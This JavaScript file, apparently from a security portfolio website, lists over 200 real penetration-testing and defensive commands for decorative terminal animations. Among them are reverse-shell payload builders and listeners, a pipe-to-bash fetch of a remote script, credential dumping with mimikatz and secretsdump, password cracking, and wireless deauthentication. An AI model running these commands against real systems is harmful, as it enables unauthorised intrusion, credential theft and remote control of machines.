// 260+ Real Cybersecurity Terminal Commands — Categorized by Tool/Domain
// Used across the portfolio as background streams, terminal displays, and decorative elements

const cyberCommands = {
  // ============ NMAP — Network Scanning & Enumeration ============
  nmap: [
    'nmap -sS -sV -O 192.168.1.0/24',
    'nmap -A -T4 --top-ports 1000 target.htb',
    'nmap --script vuln -p 1-65535 10.10.14.2',
    'nmap -sU -p 53,67,68,161,500 target.htb',
    'nmap -sN -sF -sX --reason target.htb',
    'nmap --script smb-vuln-ms17-010 10.0.0.0/24',
    'nmap -p- --min-rate 10000 -oA full_scan target',
    'nmap -sC -sV -oN initial_scan.txt target.htb',
    'nmap --script http-enum,http-headers target',
    'nmap -sP 10.10.10.0/24 -oG ping_sweep.txt',
    'nmap --script dns-brute --script-args dns-brute.threads=10 target.com',
    'nmap -sV --version-intensity 5 -p 22,80,443 target',
    'nmap --script ssl-heartbleed -p 443 target.htb',
    'nmap -D RND:10 -sS -p 80,443 target.htb',
    'nmap --script firewall-bypass --script-args firewall-bypass.helper="ftp" target',
    'nmap -f --mtu 24 -sS target.htb',
    'nmap --spoof-mac Dell -sS target.htb',
    'nmap --script auth -p 21,22,23,25 target',
    'nmap -sI zombie.host:80 target.htb',
    'nmap --script broadcast-dhcp-discover -e eth0',
    'nmap --script ssl-enum-ciphers -p 443 target',
    'nmap -sV --script=banner -p 1-10000 target',
    'nmap --script smtp-commands -p 25 target',
  ],

  // ============ METASPLOIT — Exploitation Framework ============
  metasploit: [
    'msfconsole -q -x "db_status"',
    'use exploit/multi/handler',
    'set payload windows/x64/meterpreter/reverse_tcp',
    'set LHOST tun0 && set LPORT 4444',
    'exploit -j -z',
    'sessions -l -v',
    'search type:exploit platform:linux rank:excellent',
    'use auxiliary/scanner/smb/smb_ms17_010',
    'use post/multi/recon/local_exploit_suggester',
    'msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.14.5 LPORT=443 -f elf -o rev.elf',
    'msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.5 -f exe > shell.exe',
    'db_nmap -sV -sC -oA msf_scan target.htb',
    'vulns --search CVE-2021',
    'use exploit/unix/ftp/vsftpd_234_backdoor',
    'sessions -i 1 -c "sysinfo"',
    'run hashdump',
    'use auxiliary/scanner/ssh/ssh_login',
    'spool /root/engagement/msf_output.log',
    'route add 172.16.0.0/24 255.255.255.0 1',
    'use exploit/windows/smb/ms17_010_eternalblue',
    'use auxiliary/scanner/http/dir_scanner',
    'run autoroute -s 10.1.1.0/24',
    'load kiwi && creds_all',
  ],

  // ============ WIRESHARK / TCPDUMP — Packet Analysis ============
  wireshark: [
    'tcpdump -i eth0 -w /tmp/capture.pcap -c 10000',
    'tcpdump -r capture.pcap -n -tttt',
    'tcpdump host 192.168.1.1 and port 443 -A',
    'tcpdump -i any -c 5000 -nn -vv',
    'tshark -i eth0 -f "port 443" -Y "tls.handshake"',
    'tshark -r capture.pcap -Y "http.request.method==POST"',
    'tcpdump -A -s0 port 80 | grep -i "password"',
    'tcpdump -vvv -i eth0 "tcp[tcpflags] & tcp-syn != 0"',
    'tshark -T fields -e ip.src -e ip.dst -e tcp.dstport',
    'tcpdump -i eth0 icmp and "icmp[0] != 8"',
    'tshark -r file.pcap -q -z io,stat,1,"COUNT(frame)"',
    'tcpdump -i eth0 -s 65535 -w full_packet_capture.pcap',
    'tshark -Y "dns.qry.name contains malicious" -T json',
    'tcpdump -r capture.pcap -X | less',
    'tshark -i eth0 -Y "http.response.code >= 400"',
  ],

  // ============ BURP / WEB APPLICATION TESTING ============
  webapps: [
    'sqlmap -u "http://target/page?id=1" --dbs --batch --random-agent',
    'sqlmap -u "http://target/page?id=1" --os-shell --technique=U',
    'nikto -h https://target.com -C all -maxtime 300',
    'dirb https://target.com /usr/share/wordlists/dirb/big.txt -a "Mozilla/5.0"',
    'gobuster dir -u https://target -w /usr/share/seclists/Discovery/Web-Content/raft-large-files.txt -t 50',
    'wfuzz -c -z file,/usr/share/seclists/Fuzzing/LFI/LFI-Jhaddix.txt --hc 404 http://target/FUZZ',
    'ffuf -u https://target/FUZZ -w wordlist.txt -mc 200,301,302 -o results.json',
    'whatweb -v -a 3 https://target.com',
    'wafw00f https://target.com -a',
    'nuclei -u https://target -t cves/ -severity critical,high -o findings.txt',
    'subfinder -d target.com -all -o subdomains.txt',
    'amass enum -brute -d target.com -o amass_output.txt',
    'httpx -l urls.txt -status-code -title -tech-detect -json',
    'dalfox url "http://target/page?q=test" --blind https://xss.report/c/callback',
    'feroxbuster -u https://target -w raft-medium.txt -x php,txt,html -d 3',
    'commix --url="http://target/page?cmd=id" --os-cmd="whoami"',
    'wpscan --url https://target --enumerate vp,vt,u --api-token=TOKEN',
    'sslyze --regular target.com:443',
    'testssl.sh --severity HIGH target.com:443',
  ],

  // ============ AIRCRACK-NG / WIRELESS SECURITY ============
  wireless: [
    'airmon-ng start wlan0',
    'airodump-ng wlan0mon --band abg',
    'airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w handshake wlan0mon',
    'aireplay-ng -0 15 -a AA:BB:CC:DD:EE:FF -c 11:22:33:44:55:66 wlan0mon',
    'aircrack-ng -w /usr/share/wordlists/rockyou.txt handshake-01.cap',
    'wash -i wlan0mon --ignore-fcs',
    'reaver -i wlan0mon -b AA:BB:CC:DD:EE:FF -vv -K 1',
    'airbase-ng -a AA:BB:CC:DD:EE:FF --essid "Corporate_WiFi" -c 6 wlan0mon',
    'airdecap-ng -w HEXKEY capture-01.cap',
    'wifite --kill --wpa --dict /usr/share/wordlists/rockyou.txt',
    'bettercap -iface wlan0 -eval "wifi.recon on"',
    'kismet -c wlan0mon --override channels="1,6,11"',
    'hcxdumptool -i wlan0mon -o capture.pcapng --enable_status=1',
    'hcxpcapngtool -o hash.22000 capture.pcapng',
    'mdk4 wlan0mon d -c 1,6,11',
  ],

  // ============ PASSWORD CRACKING ============
  passwords: [
    'john --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt --format=NT',
    'john --show --format=raw-sha256 cracked.txt',
    'hashcat -m 1000 -a 0 ntlm_hashes.txt rockyou.txt -O --force',
    'hashcat -m 2500 -a 0 handshake.hccapx rockyou.txt',
    'hashcat -m 0 -a 3 hashes.txt ?a?a?a?a?a?a?a --increment',
    'hydra -l admin -P /usr/share/wordlists/rockyou.txt ssh://10.10.10.5 -t 4',
    'hydra -L users.txt -P pass.txt 10.10.10.5 http-post-form "/login:user=^USER^&pass=^PASS^:F=incorrect"',
    'medusa -h 10.10.10.5 -u admin -P wordlist.txt -M ssh -t 4',
    'crunch 8 12 abcdefghijklmnopqrstuvwxyz0123456789 -o custom_wordlist.txt',
    'cewl https://target.com -d 3 -m 6 -w scraped_words.txt --with-numbers',
    'cupp -i',
    'hashcat -m 13100 -a 0 krb5tgs_hashes.txt rockyou.txt',
    'john --format=raw-md5 --rules=jumbo md5_hashes.txt',
    'ophcrack -g -d /usr/share/ophcrack/tables -t /tmp/hashes',
    'hashid -m "5f4dcc3b5aa765d61d8327deb882cf99"',
    'haiti "5f4dcc3b5aa765d61d8327deb882cf99"',
  ],

  // ============ DIGITAL FORENSICS ============
  forensics: [
    'volatility -f memory.raw imageinfo',
    'volatility -f memory.raw --profile=Win10x64_19041 pslist',
    'volatility -f memory.raw --profile=Win10x64_19041 netscan',
    'volatility -f memory.raw --profile=Win10x64_19041 filescan | grep -i "password"',
    'volatility -f memory.raw --profile=Win10x64_19041 malfind -D /tmp/injected/',
    'foremost -i disk.dd -o /cases/recovered/ -v',
    'autopsy /cases/case001/',
    'strings -a suspicious.exe | grep -iE "(http|password|key|token)"',
    'binwalk -e firmware.bin --run-as=root',
    'exiftool -all metadata_image.jpg',
    'steghide extract -sf secret_image.jpg -p passphrase',
    'file suspicious_binary && readelf -h suspicious_binary',
    'hexdump -C malware.bin | head -200',
    'dd if=/dev/sda of=/cases/disk_image.raw bs=4096 conv=noerror,sync',
    'log2timeline.py /cases/timeline.plaso /cases/disk_image.raw',
    'psort.py -o l2tcsv /cases/timeline.plaso "date > 2024-01-01"',
    'bulk_extractor -o /cases/bulk_output/ -R /cases/disk_image.raw',
    'sleuthkit fls -r -p disk_image.raw',
  ],

  // ============ REVERSE ENGINEERING ============
  reverseeng: [
    'ghidra -import suspicious.exe -scriptPath /scripts/',
    'r2 -A -d ./target_binary',
    'objdump -d -M intel binary | grep -A5 "main"',
    'gdb -q ./binary -ex "set disassembly-flavor intel" -ex "break main" -ex "run"',
    'strace -f -e trace=network ./binary 2>&1 | tee strace.log',
    'ltrace -C -f ./binary',
    'readelf -S --wide binary',
    'nm -D --demangle binary | sort',
    'upx -d packed_malware.exe -o unpacked.exe',
    'checksec --file=binary --format=json',
    'ROPgadget --binary binary --rop --only "pop|ret"',
    'rabin2 -I binary',
    'r2 -c "aaa; afl; pdf @main" binary',
    'frida -U -f com.target.app --codeshare user/script',
    'patchelf --set-interpreter /lib64/ld-linux-x86-64.so.2 binary',
  ],

  // ============ NETWORK UTILITIES ============
  network: [
    'netstat -tulpn | grep LISTEN',
    'ss -tulpn state listening',
    'iptables -A INPUT -p tcp --dport 22 -j DROP',
    'iptables -L -n -v --line-numbers',
    'ip route show table all',
    'traceroute -T -p 443 target.com',
    'dig +dnssec target.com ANY @8.8.8.8',
    'whois -h whois.arin.net target.com',
    'host -t MX target.com',
    'arp -a -n',
    'ip addr show dev eth0',
    'nslookup -type=TXT target.com',
    'ping -c 4 -s 1472 -M do target.com',
    'nc -nlvp 4444 -e /bin/bash',
    'ncat --ssl -nlvp 443',
    'socat TCP-LISTEN:8080,reuseaddr,fork TCP:target:80',
    'ssh -L 8080:internal:80 user@jumpbox',
    'ssh -D 9050 -N -f user@proxy.server',
    'proxychains4 nmap -sT -Pn target.htb',
    'curl -x socks5://127.0.0.1:9050 http://target.onion',
    'wget --mirror --convert-links --no-parent https://target.com',
    'chisel server --reverse --port 8000',
    'chisel client 10.10.14.5:8000 R:1080:socks',
  ],

  // ============ IDS/IPS — SNORT & SURICATA ============
  ids: [
    'snort -A console -q -c /etc/snort/snort.conf -i eth0',
    'suricata -c /etc/suricata/suricata.yaml -i eth0 --init-errors-fatal',
    'suricata-update --no-merge',
    'snort -T -c /etc/snort/snort.conf --daq-dir /usr/lib/daq',
    'tail -f /var/log/suricata/fast.log | grep "ET MALWARE"',
    'barnyard2 -c /etc/barnyard2/barnyard2.conf -d /var/log/snort -f snort.u2',
    'pulledpork.pl -c /etc/pulledpork/pulledpork.conf -l',
    'snort -r capture.pcap -c /etc/snort/snort.conf -A full -l /var/log/snort/',
    'suricata -r suspicious_traffic.pcap -l /var/log/suricata/',
    'oinkmaster -C /etc/oinkmaster.conf -o /etc/snort/rules/',
  ],

  // ============ SIEM — SPLUNK & ELK STACK ============
  siem: [
    '/opt/splunk/bin/splunk search "index=main sourcetype=syslog error | stats count by host"',
    '/opt/splunk/bin/splunk add monitor /var/log/auth.log -index security',
    'curl -XGET "localhost:9200/_cluster/health?pretty&wait_for_status=green"',
    'curl -XPUT "localhost:9200/security-logs" -H "Content-Type:application/json"',
    'kibana-plugin install x-pack',
    'logstash -f /etc/logstash/conf.d/syslog-pipeline.conf --config.test_and_exit',
    'filebeat setup --dashboards -E output.elasticsearch.hosts=["localhost:9200"]',
    'elastalert --config /etc/elastalert/config.yaml --rule /etc/elastalert/rules/',
    'splunk search "index=firewall action=blocked | top limit=20 src_ip"',
    'curator delete indices --filter_list \'[{"filtertype":"age","source":"creation_date","direction":"older","unit":"days","unit_count":90}]\'',
  ],

  // ============ ACTIVE DIRECTORY / BLOODHOUND ============
  activedir: [
    'bloodhound-python -d corp.local -u svc_enum -p "P@ssw0rd" -c all -ns 10.10.10.1',
    'neo4j console &',
    './SharpHound.exe -c All --zipfilename bloodhound_data.zip',
    'impacket-secretsdump corp.local/admin:"P@ssw0rd"@10.10.10.1 -outputfile secrets',
    'crackmapexec smb 10.10.10.0/24 -u admin -p "P@ssw0rd" --shares',
    'evil-winrm -i 10.10.10.1 -u administrator -H aad3b435b51404eeaad3b435b51404ee',
    'impacket-psexec corp.local/admin:"P@ssw0rd"@10.10.10.1',
    'rpcclient -U "svc_enum%P@ssw0rd" 10.10.10.1 -c "enumdomusers"',
    'enum4linux-ng -A 10.10.10.1 -u guest -p "" -oJ enum_results',
    'smbclient -L //10.10.10.1 -U "guest%" --no-pass',
    'impacket-GetNPUsers corp.local/ -usersfile users.txt -no-pass -dc-ip 10.10.10.1',
    'impacket-GetUserSPNs corp.local/svc_enum:"P@ssw0rd" -dc-ip 10.10.10.1 -outputfile kerberoast.txt',
    'kerbrute userenum --dc 10.10.10.1 -d corp.local /usr/share/seclists/Usernames/top-usernames-shortlist.txt',
    'ldapsearch -x -H ldap://10.10.10.1 -D "svc_enum@corp.local" -w "P@ssw0rd" -b "DC=corp,DC=local"',
    'impacket-ntlmrelayx -tf targets.txt -smb2support -socks',
  ],

  // ============ MIMIKATZ ============
  mimikatz: [
    'mimikatz # privilege::debug',
    'mimikatz # sekurlsa::logonpasswords',
    'mimikatz # lsadump::sam /system:SYSTEM /sam:SAM',
    'mimikatz # kerberos::golden /domain:corp.local /sid:S-1-5-21-... /krbtgt:HASH /user:admin',
    'mimikatz # sekurlsa::tickets /export',
    'mimikatz # token::elevate',
    'mimikatz # vault::cred',
    'mimikatz # lsadump::dcsync /domain:corp.local /user:krbtgt',
    'mimikatz # sekurlsa::dpapi',
    'mimikatz # crypto::certificates /export',
  ],

  // ============ VULNERABILITY SCANNERS ============
  vulnscan: [
    'openvas-start && openvas-check-setup',
    'nessuscli scan --targets=10.10.10.0/24 --policy="Advanced Scan"',
    'nikto -h https://target.com -C all -Format htm -output nikto_report.html',
    'wpscan --url https://target --enumerate vp,vt,u,dbe --api-token=TOKEN',
    'lynis audit system --quick --pentest',
    'chkrootkit -q',
    'rkhunter --check --skip-keypress --report-warnings-only',
    'trivy image --severity CRITICAL,HIGH nginx:latest',
    'grype dir:/app --only-fixed --output json > vulns.json',
    'vuls scan -config=/etc/vuls/config.toml',
  ],

  // ============ PRIVILEGE ESCALATION ============
  privesc: [
    'sudo -l 2>/dev/null',
    'find / -perm -4000 -type f 2>/dev/null',
    'find / -perm -2000 -type f 2>/dev/null',
    'getcap -r / 2>/dev/null | grep -v "Failed"',
    'cat /etc/crontab && ls -la /etc/cron.*/',
    'curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | bash',
    'uname -a && cat /proc/version',
    'cat /etc/passwd | grep -v "nologin\\|false"',
    'ps aux --forest | grep root',
    'env | grep -iE "(proxy|pass|key|token|secret)"',
    'lsof -i -P -n | grep LISTEN',
    'systemctl list-units --type=service --state=running',
    'cat /etc/shadow 2>/dev/null',
    'find / -writable -type f 2>/dev/null | grep -v proc',
    'dpkg -l 2>/dev/null | grep -i "vulnerable\\|outdated"',
  ],

  // ============ CRYPTOGRAPHY & ENCODING ============
  crypto: [
    'openssl enc -aes-256-cbc -pbkdf2 -salt -in classified.txt -out classified.enc',
    'openssl s_client -connect target.com:443 -showcerts 2>/dev/null',
    'gpg --full-gen-key --expert',
    'gpg --symmetric --cipher-algo AES256 sensitive_data.tar.gz',
    'echo "dGVzdA==" | base64 -d',
    'sha256sum important_file.bin | tee checksum.txt',
    'certbot certonly --nginx -d target.com --staging',
    'ssh-keygen -t ed25519 -C "security@arapbett.com" -f ~/.ssh/id_pentest',
    'openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -sha256 -days 365',
    'openssl dgst -sha256 -verify pubkey.pem -signature file.sig file.txt',
    'age -r age1publickey -o encrypted.age secrets.txt',
    'veracrypt --text --create /dev/sdb1 --encryption AES-Twofish --hash SHA-512',
  ],

  // ============ CONTAINER SECURITY ============
  containers: [
    'docker scan --severity high myimage:latest',
    'trivy image --severity CRITICAL myimage:latest',
    'falco --daemon -c /etc/falco/falco.yaml -r /etc/falco/falco_rules.yaml',
    'docker inspect --format="{{.State.Pid}}" container_id',
    'nsenter -t $(docker inspect -f "{{.State.Pid}}" ctr) -n ip addr',
    'docker logs --tail 500 -f suspicious_container 2>&1 | grep -i error',
    'kubectl get pods --all-namespaces -o wide',
    'kubeaudit all --manifest /path/to/deployment.yaml',
    'kube-bench run --targets=master,node --json > kubebench_results.json',
    'kubectl auth can-i --list --as=system:serviceaccount:default:default',
    'docker history --no-trunc myimage:latest',
    'dive myimage:latest',
  ],

  // ============ OSINT & RECONNAISSANCE ============
  osint: [
    'theHarvester -d target.com -b all -l 500 -f harvest_results',
    'recon-ng -w target_workspace',
    'shodan search "apache 2.4.49" --fields ip_str,port,org',
    'censys search "services.http.response.headers.server: nginx" --index-type hosts',
    'spiderfoot -s target.com -t all -o /tmp/spiderfoot_results',
    'metagoofil -d target.com -t pdf,doc,xls -l 200 -n 50 -o /tmp/metadata',
    'dnsrecon -d target.com -t axfr,std,brt -D /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt',
    'fierce --domain target.com --subdomains /usr/share/wordlists/dns.txt',
    'dmitri -winse target.com',
    'photon -u https://target.com -l 3 -t 10 --wayback -o photon_output',
  ],

  // ============ CLOUD SECURITY ============
  cloud: [
    'aws sts get-caller-identity',
    'aws s3 ls s3://target-bucket --no-sign-request',
    'prowler -M json -f us-east-1 --severity critical high',
    'ScoutSuite --provider aws --profile pentest',
    'pacu --import-keys imported_keys',
    'az ad user list --query "[].{UPN:userPrincipalName,Name:displayName}"',
    'gcloud compute instances list --format=json',
    'cloudsplaining download --profile pentest -o iam_data',
    'enumerate-iam --access-key AKIA... --secret-key SECRET',
    'trufflehog git https://github.com/target/repo --json',
  ],

  // ============ MALWARE ANALYSIS ============
  malware: [
    'yara -r /rules/malware_index.yar suspicious_directory/',
    'clamav -r --infected /tmp/suspicious/',
    'cuckoo submit --timeout 120 malware_sample.exe',
    'pe-sieve --pid 1234 --shellcode --iat 2',
    'floss --minimum-length 6 malware.exe | tee strings_output.txt',
    'olevba --decode suspicious.docm',
    'remnux analyze malware_sample.bin',
    'detect-it-easy malware.exe',
    'pestudio malware.exe',
    'inetsim --config /etc/inetsim/inetsim.conf',
  ],
};

// Flatten all commands into a single array for global use
export const allCommands = Object.values(cyberCommands).flat();

// Get commands by category
export const getCommandsByCategory = (category) => cyberCommands[category] || [];

// Get random commands (non-repeating)
export const getRandomCommands = (count = 50) => {
  const shuffled = [...allCommands].sort(() => Math.random() - 0.5);
  return shuffled.slice(0, Math.min(count, shuffled.length));
};

// Get commands with robotic prefixes
export const getRoboticCommands = (count = 50) => {
  const prefixes = [
    '[RECON]', '[SCAN]', '[EXPLOIT]', '[ENUM]', '[CRACK]',
    '[SNIFF]', '[FUZZ]', '[PIVOT]', '[EXFIL]', '[DETECT]',
    '[AUDIT]', '[HUNT]', '[PROBE]', '[TRACE]', '[DECRYPT]',
    '[INJECT]', '[DUMP]', '[PARSE]', '[RELAY]', '[INTERCEPT]',
  ];
  const cmds = getRandomCommands(count);
  return cmds.map((cmd) => ({
    prefix: prefixes[Math.floor(Math.random() * prefixes.length)],
    command: cmd,
    timestamp: `${String(Math.floor(Math.random() * 24)).padStart(2, '0')}:${String(Math.floor(Math.random() * 60)).padStart(2, '0')}:${String(Math.floor(Math.random() * 60)).padStart(2, '0')}`,
    status: Math.random() > 0.15 ? 'OK' : Math.random() > 0.5 ? 'WARN' : 'CRIT',
  }));
};

// Export categories for reference
export const commandCategories = Object.keys(cyberCommands);

export default cyberCommands;
